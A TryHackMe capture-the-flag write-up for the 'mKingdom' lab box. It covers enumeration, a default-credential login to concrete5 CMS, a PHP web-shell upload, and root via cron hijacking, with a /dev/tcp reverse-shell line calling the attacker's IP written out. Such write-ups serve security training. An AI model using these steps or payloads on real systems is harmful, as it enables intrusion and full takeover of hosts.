CTF : mKingdom

CTF mKingdom writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 06 July 2024

CTF : mKingdom

Informations

  • IP: 10.10.239.253
  • MYIP: 10.11.96.62

First enumeration

Basics

  • NMAP
console
nmap -p85 -A 10.10.239.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-05 22:51 CEST
Nmap scan report for 10.10.239.253
Host is up (0.032s latency).

PORT   STATE SERVICE VERSION
85/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0H N0! PWN3D 4G4IN

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

Vulnerabilities search

console
dirsearch -r -u http://10.10.239.253:85
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/boula/CTF/mKingdom/reports/http_10.10.239.253_85/_24-07-05_22-53-40.txt

Target: http://10.10.239.253:85/

[22:53:40] Starting: 
[...]
[22:53:57] 301 -  314B  - /app  ->  http://10.10.239.253:85/app/

Going to 10.10.239.253:85/app/ leads us to 10.10.239.253:85/app/castle/ which seems to be a blog using concrete5 CMS.

So I tried to login with admin:password credentials and... it works :)

Now we head to system settings and, in the file type section, we add php file type.

Now I prepared php remote shell and upload it via the file manager.

File manager is so cool that it gives me the location : http://10.10.239.253:85/app/castle/application/files/3217/2021/3624/shell.php

Exploit

We just need to listen on port 1234 via netcat : 

bash
nc -nvlp 1234
bash
curl http://10.10.239.253:85/app/castle/application/files/3217/2021/3624/shell.php

And I got a shell :)

Privilege escalation

Enumeration for privesc

There are two users : 

console
mario:x:1001:1001:,,,:/home/mario:/bin/bash
toad:x:1002:1002:,,,:/home/toad:/bin/bash

In /var/www/html/app/castle/application/config/database.php

I found this informations : 

php
<?php

return [
    'default-connection' => 'concrete',
    'connections' => [
        'concrete' => [
            'driver' => 'c5_pdo_mysql',
            'server' => 'localhost',
            'database' => 'mKingdom',
            'username' => 'toad',
            'password' => 'toadisthebest',
            'character_set' => 'utf8',
            'collation' => 'utf8_unicode_ci',
        ],
    ],
];

Let's try those creds for user toad :

su - toad

Ok, we're now toad :)

env command gives me an interesting information : PWD_token=aWthVGVOVEFOdEVTCg=

bash
echo -ne 'aWthVGVOVEFOdEVTCg==' | base64 -d -
ikaTeNTANtES

Using this we can su to mario :)

Now I found using pspy that root setted up a cron job that executes this command :

/bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.log

And with this command :

find / -writable -print 2>/dev/null

I found that /etc/hosts is writable by the user mario.

Exploit

  • On the attacker box :

First we will create the correct path : 

bash
mkdir -p app/castle/application/

Then, let's craft a file named counter.sh : 

bash
echo "bash -i >& /dev/tcp/10.11.96.62/1235 0>&1" > app/castle/application/counter.sh

Now, everything is ready and we just have to serve this file through http on port 85 : 

bash
sudo python3 -m http.server 85

On another terminal : 

bash
nc -nlvp 1235
  • On victim box :

Now I can edit /etc/hosts ant replace 127.0.1.1 by the ip of the attacker box. Once it's done we just have to wait for a minute...

And we got a root access \o/